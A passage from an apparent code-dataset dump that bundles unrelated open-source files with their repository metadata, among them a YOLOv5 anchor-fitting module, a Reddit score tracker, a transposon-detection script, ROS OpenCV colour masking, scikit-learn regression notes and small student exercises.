dockerenv_config = dockerenvs[docker]\n\n config = {\n **BaseConfig.__dict__,\n **dockerenv_config.__dict__,\n }\n config[\"DOCKER\"] = docker\n pprint(config, indent=4)\n return config\n\n\ndef configure(app: Flask):\n \"\"\"Setup environment based on the app.\n\n Args:\n app (Flask): current Flask application.\n \"\"\"\n app.config[\"ENV\"] = app.config[\"FLASK_ENV\"]\n environ[\"FLASK_ENV\"] = app.config[\"FLASK_ENV\"]\n\n\n","repo_name":"dakobedbard/Darujistan","sub_path":"darujistan-api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37586981918","text":"import praw\nimport sys\nimport time\nimport traceback\n\nUSERAGENT = \"\"\nAPP_ID = \"\"\nAPP_SECRET = \"\"\nAPP_URI = \"\"\nAPP_REFRESH = \"\"\n# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/\n\ntry:\n import bot\n USERAGENT = bot.aG\n APP_ID = bot.oG_id\n APP_SECRET = bot.oG_secret\n APP_URI = bot.oG_uri\n APP_REFRESH = bot.oG_scopes['all']\nexcept ImportError:\n pass\n\nprint('logging in')\nr = praw.Reddit(USERAGENT)\nr.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)\nr.refresh_access_information(APP_REFRESH)\n\ndef submissionscoretracker(submissionid):\n if '_' not in submissionid:\n submissionid = 't3_' + submissionid\n submission = r.get_info(thing_id=submissionid)\n \n outfile = open(submission.fullname + '.txt', 'a+')\n last_refresh = time.time()\n while True:\n try:\n if time.time() - last_refresh:\n r.refresh_access_information()\n last_refresh = time.time()\n submission.refresh()\n print('%s, %d' % (time.strftime('%H:%M:%S'), submission.score))\n outfile.write('%d, %d\\n' % (int(time.time()), submission.score))\n outfile.flush()\n except KeyboardInterrupt:\n outfile.close()\n return\n except:\n traceback.print_exc()\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n submissionid = input('id: ')\n else:\n submissionid = sys.argv[1]\n submissionscoretracker(submissionid)","repo_name":"voussoir/reddit","sub_path":"_old/SubmissionScoreTracker/submissionscoretracker.py","file_name":"submissionscoretracker.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"77"} +{"seq_id":"43357042752","text":"#!/usr/bin/python\n\"\"\"\nXuenan Pi\n29-9-2015\nScript to detect reference insertions\n\"\"\"\n\nfrom sys import argv\nfrom functions import read_file_1\nimport os.path\nimport os\nimport subprocess\n\ndef extract_reads(infile_name,te_name,mq=30):\n \"\"\"use samtool to extract reads mapped around the end of the transposon \n sequence\n \"\"\" \n outfile = None\n if os.path.isfile(infile_name):\n cmd_f = \"samtools view -F 16 %s | awk '$3!=\\\"%s\\\" && $7!=\\\"=\\\" && \\\n $5 >= %d'\" % (infile_name,te_name,mq)\n p_f = subprocess.Popen([cmd_f],shell=True,stdout=subprocess.PIPE,\\\n stderr=subprocess.PIPE)\n forward,err = p_f.communicate()\n cmd_r = \"samtools view -f 16 %s | awk '$3!=\\\"%s\\\" && $7!=\\\"=\\\" && \\\n $5 >= %d'\" % (infile_name,te_name,mq)\n p_r = subprocess.Popen([cmd_r],shell=True,stdout=subprocess.PIPE,\\\n stderr=subprocess.PIPE)\n reverse,err = p_r.communicate()\n return forward,reverse\n\ndef group(chr_prefix,infile,insert_size,read_length,flag):\n \"\"\"put all supportive reads in a group\"\"\"\n final_result = []\n fileline = infile.strip().split('\\n')\n p_list = [[0,0,0,0]] \n i = 0\n while i < len(fileline):\n line = fileline[i].strip().split('\\t')[:10]\n if flag:\n line += ['-']\n else:\n line += ['+']\n if chr_prefix in line[2]:\n result = check_line(p_list,line,insert_size,read_length)\n if result[0]:\n p_list += [result[1:]]\n i += 1\n else:\n if not i+1 == len(fileline):\n final_result += [p_list]\n p_list = [result[1:]]\n i += 1\n else:#only for the last read\n final_result += [p_list]\n p_list = [result[1:]]\n i += 1\n else:\n i += 1\n pass\n return final_result\n\ndef check_line(p_list,line,insert_size,read_length):\n \"\"\"check if the reads belong to the group\"\"\"\n line_list = line[:]\n chr = line_list[2]\n loci1 = int(line_list[3])#start of alignment\n if chr == p_list[0][0] and abs(loci1-p_list[0][1]) <= insert_size:\n return True,chr,loci1,len(line[-2]),line[-1]\n else:\n return False,chr,loci1,len(line[-2]),line[-1]\n\n\ndef info(raw_list,read_length):\n \"\"\"\"generate the start and end location for each group. Like chr start \n end num_sr length: SL2.40ch00 1200 1300 10 100.\"\"\"\n for i in raw_list:\n if len(i) >= 3:#filter out sr<=3 \n chr = i[0][0]\n if i[0][-1]=='-':#left alignment\n end = i[-1][1]+read_length\n leftsr = len(i)\n yield [chr,end,leftsr,\"left\"]\n else:\n start = i[0][1]\n rightsr = len(i)\n yield [chr,start,rightsr,\"right\"]\n\ndef write_file(result_list,homo_dict,gap_dict,distan,outfile_copy,outfile_gap):\n \"\"\"confirm the group of face each other reads are matched with blast result\n \"\"\"\n i = 0\n out_gap = open(outfile_gap,'w+')\n out_copy = open(outfile_copy,'w+')\n while i[6301, 1, 2]\n # 所有anchor的wh k[None] [9, 2]->[1, 9, 2]\n # r: target的高h宽w与anchor的高h_a宽w_a的比值,即h/h_a, w/w_a [6301, 9, 2] 有可能大于1,也可能小于等于1\n r = wh[:, None] / k[None]\n # x 高宽比和宽高比的最小值 无论r大于1,还是小于等于1最后统一结果都要小于1 [6301, 9]\n x = torch.min(r, 1 / r).min(2)[0] # ratio metric\n # best [6301] 为每个gt框选择匹配所有anchors宽高比例值最好的那一个比值\n best = x.max(1)[0] # best_x\n # aat(anchors above threshold) 每个target平均有多少个anchors\n aat = (x > 1 / thr).float().sum(1).mean() # # 当axis=1时,求的是每一行元素的和\n # bpr(best possible recall) = 最多能被召回(通过thr)的gt框数量 / 所有gt框数量 小于0.98 才会用k-means计算anchor\n bpr = (best > 1 / thr).float().mean() # best possible recall\n return bpr, aat\n\n stride = m.stride.to(m.anchors.device).view(-1, 1, 1) # model strides\n # anchors: [N,2] 所有anchors的宽高 基于缩放后的图片大小(较长边为640 较小边相应缩放)\n anchors = m.anchors.clone() * stride # current anchors\n # 计算出数据集所有图片的wh和当前所有anchors的bpr和aat\n # bpr: bpr(best possible recall): 最多能被召回(通过thr)的gt框数量 / 所有gt框数量 [1] 0.96223 小于0.98 才会用k-means计算anchor\n # aat(anchors past thr): [1] 3.54360 通过阈值的anchor个数\n bpr, aat = metric(anchors.cpu().view(-1, 2))\n s = f'\\n{PREFIX}{aat:.2f} anchors/target, {bpr:.3f} Best Possible Recall (BPR). '\n # todo 之前是< ? 考虑这9类anchor的宽高和gt框的宽高之间的差距, 如果bpr<0.98(说明当前anchor不能很好的匹配数据集gt框)就会根据k-means算法重新聚类新的anchor\n if bpr > 0.98: # threshold to recompute\n LOGGER.info(f'{s}Current anchors are a good fit to dataset ✅')\n else:\n LOGGER.info(f'{s}Anchors are a poor fit to dataset ⚠️, attempting to improve...')\n na = m.anchors.numel() // 2 # number of anchors\n\n # 如果bpr<0.98(最大为1 越大越好) 使用k-means + 遗传进化算法选择出与数据集更匹配的anchors框 [9, 2]\n anchors = kmean_anchors(dataset, n=na, img_size=imgsz, thr=thr, gen=1000, verbose=False)\n\n # 计算新的anchors的new_bpr\n new_bpr = metric(anchors)[0]\n # 比较k-means + 遗传进化算法进化后的anchors的new_bpr和原始anchors���bpr\n # 注意: 这里并不一定进化后的bpr必大于原始anchors的bpr, 因为两者的衡量标注是不一样的 进化算法的衡量标准是适应度 而这里比的是bpr\n if new_bpr > bpr: # replace anchors\n anchors = torch.tensor(anchors, device=m.anchors.device).type_as(m.anchors)\n # 替换m的anchors(相对各个feature map) [9, 2] -> [3, 3, 2]\n m.anchors[:] = anchors.clone().view_as(m.anchors)\n # 检查anchor顺序和stride顺序是否一致 不一致就调整\n # 因为我们的m.anchors是相对各个feature map 所以必须要顺序一致 否则效果会很不好\n check_anchor_order(m) # must be in pixel-space (not grid-space)\n m.anchors /= stride\n s = f'{PREFIX}Done ✅ (optional: update model *.yaml to use these anchors in the future)'\n else:\n s = f'{PREFIX}Done ⚠️ (original anchors better than new anchors, proceeding with original anchors)'\n LOGGER.info(s)\n\n\ndef kmean_anchors(dataset='./data/coco128.yaml', n=9, img_size=640, thr=4.0, gen=1000, verbose=True):\n \"\"\"在check_anchors中调用\n 使用K-means + 遗传算法 算出更符合当前数据集的anchors\n Creates kmeans-evolved anchors from training dataset\n :params path: 数据集的路径/数据集本身\n :params n: anchor框的个数\n :params img_size: 数据集图片约定的大小\n :params thr: 阈值 由hyp['anchor_t']参数控制\n :params gen: 遗传算法进化迭代的次数(突变 + 选择)\n :params verbose: 是否打印所有的进化(成功的)结果 默认传入是Fasle的 只打印最佳的进化结果即可\n :return k: k-means + 遗传算法进化 后的anchors\n\t\"\"\"\n from scipy.cluster.vq import kmeans\n\n npr = np.random\n # 注意一下下面的thr不是传入的thr,而是1/thr, 所以在计算指标这方面还是和check_anchor一样\n thr = 1 / thr\n\n def metric(k, wh): # compute metrics\n \"\"\"用于print_results函数和anchor_fitness函数\n 计算ratio metric: 整个数据集的gt框与anchor对应宽比和高比即:gt_w/k_w,gt_h/k_h + x + best_x 用于后续计算bpr+aat\n 注意我们这里选择的metric是gt框与anchor对应宽比和高比 而不是常用的iou 这点也与nms的筛选条件对应 是yolov5中使用的新方法\n :params k: anchor框\n :params wh: 整个数据集的wh [N, 2]\n :return x: [N, 9] N个gt框与所有anchor框的宽比或高比(两者之中较小者)\n :return x.max(1)[0]: [N] N个gt框与所有anchor框中的最大宽比或高比(两者之中较小者)\n \"\"\"\n # [N, 1, 2] / [1, 9, 2] = [N, 9, 2] N个gt_wh和9个anchor的k_wh宽比和高比\n # 两者的重合程度越高 就越趋近于1 远离1(<1 或 >1)重合程度都越低\n r = wh[:, None] / k[None]\n # r=gt_height/anchor_height gt_width / anchor_width 有可能大于1,也可能小于等于1\n # torch.min(r, 1. / r): [N, 9, 2] 将所有的宽比和高比统一到<=1\n # .min(2): value=[N, 9] 选出每个gt个和anchor的宽比和高比最小的值 index: [N, 9] 这个最小值是宽比(0)还是高比(1)\n # [0] 返回value [N, 9] 每个gt个和anchor的宽比和高比最小的值 就是所有gt与anchor重合程度最低的\n x = torch.min(r, 1 / r).min(2)[0] # ratio metric\n # x = wh_iou(wh, torch.tensor(k)) # iou metric\n # x.max(1)[0]: [N] 返回每个gt和所有anchor(9个)中宽比/高比最大的值\n return x, x.max(1)[0] # x, best_x\n\n def anchor_fitness(k): # mutation fitness\n \"\"\"用于kmean_anchors函数\n 适应度计算 优胜劣汰 用于遗传算法中衡量突变是否有效的标注 如果有效就进行选择操作 没效就继续下一轮的突变\n :params k: [9, 2] k-means生成的9个anchors wh: [N, 2]: 数据集的所有gt框的宽高\n :return (best * (best > thr).float()).mean()=适应度计算公式 [1] 注意和bpr有区别 这里是自定义的一种适应度公式\n 返回的是输入此时anchor k 对应的适应度\n \"\"\"\n _, best = metric(torch.tensor(k, dtype=torch.float32), wh)\n return (best * (best > thr).float()).mean() # fitness\n\n def print_results(k, verbose=True):\n \"\"\"用于kmean_anchors函数中打印k-means计算相关信息\n 计算bpr、aat=>打印信息: 阈值+bpr+aat anchor个数+图片大小+metric_all+best_mean+past_mean+Kmeans聚类出来的anchor框(四舍五入)\n :params k: k-means得到的anchor k\n :return k: input\n \"\"\"\n # 将k-means得到的anchor k按面积从小到大啊排序\n k = k[np.argsort(k.prod(1))] # sort small to large\n # x: [N, 9] N个gt框与所有anchor框的宽比或高比(两者之中较小者)\n # best: [N] N个gt框与所有anchor框中的最大 宽比或高比(两者之中较小者)\n x, best = metric(k, wh0)\n # (best > thr).float(): True=>1. False->0. .mean(): 求均值\n # bpr(best possible recall): 最多能被召回(通过thr)的gt框数量 / 所有gt框数量 [1] 0.96223 小于0.98 才会用k-means计算anchor\n # aat(anchors above threshold): [1] 3.54360 每个target平均有多少个anchors\n bpr, aat = (best > thr).float().mean(), (x > thr).float().mean() * n # best possible recall, anch > thr\n s = f'{PREFIX}thr={thr:.2f}: {bpr:.4f} best possible recall, {aat:.2f} anchors past thr\\n' \\\n f'{PREFIX}n={n}, img_size={img_size}, metric_all={x.mean():.3f}/{best.mean():.3f}-mean/best, ' \\\n f'past_thr={x[x > thr].mean():.3f}-mean: '\n for x in k:\n s += '%i,%i, ' % (round(x[0]), round(x[1]))\n if verbose:\n LOGGER.info(s[:-2])\n return k\n\n if isinstance(dataset, str): # *.yaml file\n with open(dataset, errors='ignore') as f:\n data_dict = yaml.safe_load(f) # model dict\n from utils.dataloaders import LoadImagesAndLabels\n dataset = LoadImagesAndLabels(data_dict['train'], augment=True, rect=True)\n\n # 得到数据集中所有数据的wh\n # 将数据集图片的最长边缩放到img_size, 较小边相应缩放\n shapes = img_size * dataset.shapes / dataset.shapes.max(1, keepdims=True)\n # 将原本数据集中gt boxes归一化的wh缩放到shapes尺度\n wh0 = np.concatenate([l[:, 3:5] * s for s, l in zip(shapes, dataset.labels)]) # wh\n\n # 统计gt boxes中宽或者高小于3个像素的个数, 目标太小 发出警告\n i = (wh0 < 3.0).any(1).sum()\n if i:\n LOGGER.info(f'{PREFIX}WARNING ⚠️ Extremely small objects found: {i} of {len(wh0)} labels are <3 pixels in size')\n # 筛选出label大于2个像素的框拿来聚类,[...]内的相当于一个筛选器,为True的留下\n wh = wh0[(wh0 >= 2.0).any(1)].astype(np.float32) # filter > 2 pixels\n # wh = wh * (npr.rand(wh.shape[0], 1) * 0.9 + 0.1) # multiply by random scale 0-1\n\n # Kmeans聚类方法: 使用欧式距离来进行聚类\n try:\n LOGGER.info(f'{PREFIX}Running kmeans for {n} anchors on {len(wh)} points...')\n # 计算宽和高的标准差->[w_std,h_std]\n assert n <= len(wh) # apply overdetermined constraint\n s = wh.std(0) # sigmas for whitening\n # 开始聚类,仍然是聚成n类,返回聚类后的anchors k(这个anchor k是白化后数据的anchor框)\n # 另外还要注意的是这里的kmeans使用欧式距离来计算的\n # 运行k-means的次数为30次 obs: 传入的数据必须先白化处理 'whiten operation'\n # 白化处理: 新数据的标准差=1 降低数据之间的相关度,不同数据所蕴含的信息之间的重复性就会降低,网络的训练效率就会提高\n # 白化操作博客: https://blog.csdn.net/weixin_37872766/article/details/102957235\n k = kmeans(wh / s, n, iter=30)[0] * s # points\n assert n == len(k) # kmeans may return fewer points than requested if wh is insufficient or too similar\n except Exception:\n LOGGER.warning(f'{PREFIX}WARNING ⚠️ switching strategies from kmeans to random init')\n k = np.sort(npr.rand(n * 2)).reshape(n, 2) * img_size # random init\n wh, wh0 = (torch.tensor(x, dtype=torch.float32) for x in (wh, wh0))\n k = print_results(k, verbose=False)\n\n # Plot\n # k, d = [None] * 20, [None] * 20\n # for i in tqdm(range(1, 21)):\n # k[i-1], d[i-1] = kmeans(wh / s, i) # points, mean distance\n # fig, ax = plt.subplots(1, 2, figsize=(14, 7), tight_layout=True)\n # ax = ax.ravel()\n # ax[0].plot(np.arange(1, 21), np.array(d) ** 2, marker='.')\n # fig, ax = plt.subplots(1, 2, figsize=(14, 7)) # plot wh\n # ax[0].hist(wh[wh[:, 0]<100, 0],400)\n # ax[1].hist(wh[wh[:, 1]<100, 1],400)\n # fig.savefig('wh.png', dpi=200)\n\n # Evolve 类似遗传/进化算法 变异操作\n # f: fitness 0.62690\n # sh: (9,2)\n # mp: 突变比例mutation prob=0.9 s: sigma=0.1\n f, sh, mp, s = anchor_fitness(k), k.shape, 0.9, 0.1 # fitness, generations, mutation prob, sigma\n pbar = tqdm(range(gen), bar_format=TQDM_BAR_FORMAT) # progress bar\n for _ in pbar:\n # 重复1000次突变+选择 选择出1000次突变里的最佳anchor k和最佳适应度f\n v = np.ones(sh)\n while (v == 1).all(): # mutate until a change occurs (prevent duplicates)\n # 产生变异规则 mutate until a change occurs (prevent duplicates)\n # npr.random(sh) < mp: 让v以90%的比例进行变异 选到变异的就为1 没有选到变异的就为0\n v = ((npr.random(sh) < mp) * random.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0)\n kg = (k.copy() * v).clip(min=2.0)\n # 计算变异后的anchor kg的适应度\n fg = anchor_fitness(kg)\n # 如果变异后的anchor kg的适应度>最佳适应度k 就进行选择操作\n if fg > f:\n # 选择变异后的anchor kg为最佳的anchor k 变异后的适应度fg为��佳适应度f\n f, k = fg, kg.copy()\n\n # 打印信息\n pbar.desc = f'{PREFIX}Evolving anchors with Genetic Algorithm: fitness = {f:.4f}'\n if verbose:\n print_results(k, verbose)\n\n return print_results(k).astype(np.float32)\n","repo_name":"yblir/yolov5_origin_comment","sub_path":"utils/autoanchor.py","file_name":"autoanchor.py","file_ext":"py","file_size_in_byte":16003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"556829396","text":"def cria_matriz(L, C):\n M = []\n linha = C * [0]\n for i in range(L):\n M.append(linha[:])\n return M\ndef preenche_matriz(M, L, C):\n for i in range(L):\n for j in range(C):\n M[i][j] = float(input())\nM = cria_matriz(12,12)\nL = int(input())\nT = input()\npreenche_matriz(M, 12, 12)\nif T == 'S':\n resultado = sum(M[L])\nelse:\n resultado = sum(M[L]) / 12\nprint(f'{resultado:.f}')\n","repo_name":"ViniciusAlbanit/python_exercicios","sub_path":"exercicios/matriz.py","file_name":"matriz.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"33528428351","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# Ejercicio 4\n# Código para los alumnos\n\n\ndef tablaMultiplicar(n):\n for i in range(11):\n print(n,\"x\",i,\"=\",n*i)\n \n\ndef maximoComunDivisor(n1,n2):\n mayor = max(n1, n2)\n menor = min(n1, n2)\n if ((n1 and n2) == 0):\n menor = mayor\n else:\n r = mayor % menor\n while r != 0:\n mayor = r\n r = menor%r\n menor = mayor\n print(menor)\n return menor\n\ndef minimoComunMultiplo(n1,n2):\n menor = min(n1,n2)\n\n for i in range(1,menor):\n if (n1%i==0 and n2%i==0):\n mcd = i\n mcm = (n1*n2)/mcd\n print(mcm)\n return mcm\n\n","repo_name":"JoseAntonioVelasco/2DAM_Workspaces","sub_path":"Python/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29453734759","text":"import random\ndef ocultar_letras(palabra, cantidad):\n h=0\n while hHello World my Babald

\\n\\\n\\\n\\\n\\\n\"This

One more time

\"\"\"\n\n self.assertEqual(mixed_img_order_html,\n markdown.markdown(mixed_img_order_mdx,\n extensions=[PictureExtension()]))\n self.assertEqual(mixed_img_order_html,\n markdown.markdown(mixed_size_order_mdx,\n extensions=[PictureExtension()]))\n","repo_name":"speechkey/mdx_picture","sub_path":"mdx_picture/tests/test_block_elem_order.py","file_name":"test_block_elem_order.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75289303929","text":"#!/usr/bin/env python\r\nfrom __future__ import print_function\r\n\r\nimport roslib\r\nroslib.load_manifest('cvtest')\r\nimport sys\r\nimport rospy\r\nimport numpy as np\r\nimport cv2\r\nfrom std_msgs.msg import String\r\nfrom sensor_msgs.msg import Image\r\nfrom cv_bridge import CvBridge, CvBridgeError\r\n\r\nclass image_converter:\r\n\r\n def __init__(self):\r\n self.image_pub = rospy.Publisher(\"image_topic_2\",Image,queue_size=10)\r\n\r\n self.bridge = CvBridge()\r\n self.image_sub = rospy.Subscriber(\"/video_source/raw\",Image,self.callback)\r\n\r\n def callback(self,data):\r\n try:\r\n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\r\n \r\n #img_gray = cv2.cvtColor(cv_image, cv2.COLOR_BGR2GRAY)\r\n cv_image_blur = cv2.GaussianBlur(cv_image,(5,5),0) #Aplicando un blur a la imagen \r\n \r\n hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\r\n \r\n redBajo1 = np.array([0, 100, 20], np.uint8)\r\n redAlto1 = np.array([8, 255, 255], np.uint8)\r\n redBajo2=np.array([175, 100, 20], np.uint8)\r\n redAlto2=np.array([179, 255, 255], np.uint8)\r\n \r\n lower_green = np.array([35, 30, 110])\r\n upper_green = np.array([60, 255, 255])\r\n \r\n maskRed1 = cv2.inRange(hsv, redBajo1, redAlto1)\r\n maskRed2 = cv2.inRange(hsv, redBajo2, redAlto2)\r\n maskRed = cv2.add(maskRed1, maskRed2)\r\n \r\n mask_green = cv2.inRange(hsv, lower_green, upper_green)\r\n \r\n res_green = cv2.bitwise_and(cv_image,cv_image, mask= mask_green)\r\n res_red = cv2.bitwise_and(cv_image,cv_image, mask= mask_Red)\r\n \r\n \r\n except CvBridgeError as e:\r\n print(e)\r\n\r\n (rows,cols,channels) = cv_image.shape\r\n if cols > 60 and rows > 60 :\r\n cv2.circle(cv_image, (50,50), 10, 255)\r\n\r\n cv2.imshow(\"Image window green\", res_green)\r\n cv2.imshow(\"Image window red\", res_red)\r\n cv2.waitKey(3)\r\n\r\n try:\r\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, \"bgr8\"))\r\n \r\n except CvBridgeError as e:\r\n print(e)\r\n\r\ndef main(args):\r\n ic = image_converter()\r\n rospy.init_node('image_converter', anonymous=True)\r\n try:\r\n rospy.spin()\r\n except KeyboardInterrupt:\r\n print(\"Shutting down\")\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"jorge-vh/puzzlebot","sub_path":"src/cvtest/src/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292696651","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author = 'wyx'\n@time = 2018/5/11 15:08\n@annotation = ''\n\"\"\"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.linear_model import SGDRegressor, LinearRegression\n\nimport util\n\nX = 2 * np.random.rand(100, 1)\ny = 4 + 3 * X + np.random.randn(100, 1)\n# add x0 = 1 to each instance\nX_b = np.c_[np.ones((100, 1)), X]\nX_new = np.array([[0], [2]])\nif False:\n \"\"\"\n Use theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y) 直接\n when the number of features grows large The Normal Equation gets very slow\n \"\"\"\n\n # X_b = X\n theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)\n print(theta_best)\n\n # X_new_b = X_new\n X_new_b = np.c_[np.ones((2, 1)), X_new] # add x0 = 1 to each instance\n y_predict = X_new_b.dot(theta_best)\n print(y_predict)\n\n plt.plot(X_new, y_predict, \"r-\")\n plt.plot(X, y, \"b.\")\n plt.axis([0, 2, 0, 15])\n plt.show()\nif False:\n lin_reg = LinearRegression()\n lin_reg.fit(X, y)\n print(lin_reg.intercept_, lin_reg.coef_)\n print(lin_reg.predict(X_new))\nif False:\n \"\"\"\n Batch Gradient Descent\n \n 它使用整个训练集来计算每一步的梯度,这使得训练集很大时非常缓慢\n \"\"\"\n eta = 0.1 # learning rate\n n_iterations = 1000\n m_instance_num = 100\n theta = np.random.randn(2, 1) # random initialization\n for iteration in range(n_iterations):\n gradients = 2 / m_instance_num * X_b.T.dot(X_b.dot(theta) - y)\n theta = theta - eta * gradients\n\n print(theta)\nif False:\n \"\"\"\n Stochastic Gradient Descent\n 随机梯度下降只是在每个步骤中在训练集中选取一个随机实例,并仅基于该单个实例计算梯度\n 由于其随机性,该算法比批处理梯度成本函数会上下反弹 只会平均减少 随着时间的推移,\n 它将最终接近最小值,但一旦它到达那里,它将继续反弹,永远不会稳定下来。\n 所以一旦算法停止,最终的参数值是好的,但不是最优的\n \n \n 当成本函数非常不规则时,这实际上可以帮助算法跳出局部最小值,\n 因此,随机性很好地摆脱局部最优。但不好,因为这意味着该算法永远无法最小化\n \n 方法是\n 逐渐降低学习率。这些步骤开始较大(这有助于快速进展并避免局部最小值),\n 然后变得越来越小,从而使算法在全局最小值处达到最小。(simulated annealing模拟退火)\n \"\"\"\n n_epochs = 50\n t0, t1 = 5, 50 # learning schedule hyperparameters\n\n\n def learning_schedule(t):\n return t0 / (t + t1)\n\n\n theta = np.random.randn(2, 1) # random initialization\n for epoch in range(n_epochs):\n for i in range(m_instance_num):\n random_index = np.random.randint(m_instance_num)\n xi = X_b[random_index:random_index + 1]\n yi = y[random_index:random_index + 1]\n gradients = 2 * xi.T.dot(xi.dot(theta) - yi)\n eta = learning_schedule(epoch * m_instance_num + i)\n theta = theta - eta * gradients\n print(theta)\n \"\"\"\n Mini-batch Gradient Descent\n 小批量的小随机实例集上的梯度\n\n 进展比SGD更不稳定,特别是在相当大的小批量时。\n 因此,小批量GD最终会走得比SGD更接近最小值。但另一方面,它可能难以摆脱局部最小值\n \"\"\"\n\nif False:\n sgd_reg = SGDRegressor(max_iter=50, penalty=None, eta0=0.1)\n sgd_reg.fit(X, y.ravel())\n print(sgd_reg.intercept_, sgd_reg.coef_)\n util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n \"\"\"\n Polynomial Regression\n \n y = ax2 + bx + c\n \n two features a and b, PolynomialFeatures with degree=3 would not only add the features a2, a3, b2, and b3, \n but also the combinations ab, a2b, and ab2.\n \"\"\"\n m = 100\n X = 6 * np.random.rand(m, 1) - 3\n y = 0.5 * X ** 2 + X + 2 + np.random.randn(m, 1)\n\n from sklearn.preprocessing import PolynomialFeatures\n\n poly_features = PolynomialFeatures(degree=2, include_bias=False)\n X_poly = poly_features.fit_transform(X)\n lin_reg = LinearRegression()\n lin_reg.fit(X_poly, y)\n print(lin_reg.intercept_, lin_reg.coef_)\n coef = lin_reg.coef_[0]\n print(str(coef[1]) + ' X^2 + ' + str(coef[0]) + 'X + ' + str(lin_reg.intercept_[0]))\n\n from sklearn.pipeline import Pipeline\n\n polynomial_regression = Pipeline((\n (\"poly_features\", PolynomialFeatures(degree=10, include_bias=False)),\n (\"sgd_reg\", LinearRegression()),\n ))\n util.plot_learning_curves(polynomial_regression, X, y)\n\nif False:\n \"\"\"\n Ridge Regression \n 超参数α控制你想要规范模型的程度。\n 如果α= 0,则岭回归就是线性回归。\n 如果α非常大,则所有权重非常接近零\n \n 对于正则化模型 scale非常重要\n \"\"\"\n from sklearn.linear_model import Ridge\n\n # Alternatively you can use the Ridge class with the \"sag\" solver. Stochastic Average GD is a variant of SGD.\n # Scikit-Learn using a closed-form solu‐ tion (a variant of Equation 4-9 using a matrix factorization technique by André-Louis Cholesky):\n # ridge_reg = Ridge(alpha=1, solver=\"cholesky\")\n ridge_reg = Ridge(alpha=1, solver=\"saga\")\n ridge_reg.fit(X, y)\n print(ridge_reg.predict([[1.5]]))\n util.plot_learning_curves(ridge_reg, X, y)\n\n sgd_reg = SGDRegressor(penalty=\"l2\")\n sgd_reg.fit(X, y.ravel())\n print(sgd_reg.predict([[1.5]]))\n util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n \"\"\"\n Lasso Regression\n 所有权重归零\n \"\"\"\n from sklearn.linear_model import Lasso\n\n lasso_reg = Lasso(alpha=0.1)\n lasso_reg.fit(X, y)\n print(lasso_reg.predict([[1.5]]))\n util.plot_learning_curves(lasso_reg, X, y)\n\n sgd_reg = SGDRegressor(penalty=\"l1\")\n sgd_reg.fit(X, y.ravel())\n print(sgd_reg.predict([[1.5]]))\n util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n \"\"\"\n When r = 0, Elastic Net is equivalent to Ridge Regression\n when r = 1, it is equivalent to Lasso Regression\n l1_ratio = r\n \n Ridge is a good default \n Elastic Net比Lasso更受欢迎 \n \n Lasso 不稳定\n feature number > instance number \n or several features are strongly correlated\n \"\"\"\n from sklearn.linear_model import ElasticNet\n\n elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)\n elastic_net.fit(X, y)\n print(elastic_net.predict([[1.5]]))\n util.plot_learning_curves(elastic_net, X, y)\n","repo_name":"631068264/learn-sktf","sub_path":"sk/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30337846246","text":"# -*- coding: utf-8 -*-\n# B - Chocolate\n# https://atcoder.jp/contests/abc092/tasks/abc092_b\n\nn = int(input())\nd, x = map(int, input().split())\na = [int(input()) for _ in range(n)]\nchoco = [0] * n\n\nfor i in range(n):\n count = d\n while count > 0:\n count -= a[i]\n choco[i] += 1\n\nans = sum(choco) + x\nprint(ans)\n\n# 20:05 - 20:24\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_B/ABC092B.py","file_name":"ABC092B.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2251437890","text":"import os, json\nfrom pathlib import Path\nimport subprocess as sp, sys\nimport hashlib\nimport bibtexparser\nfrom papers import logger\nfrom papers.filename import Format, NAMEFORMAT, KEYFORMAT\nfrom papers import __version__\nfrom papers.utils import bcolors, check_filesdir, search_config\n\n# GIT = False\nDRYRUN = False\n\n# config directory location\nHOME = os.environ.get('HOME',os.path.expanduser('~'))\nCONFIG_HOME = os.environ.get('XDG_CONFIG_HOME', os.path.join(HOME, '.config'))\nCACHE_HOME = os.environ.get('XDG_CACHE_HOME', os.path.join(HOME, '.cache'))\nDATA_HOME = 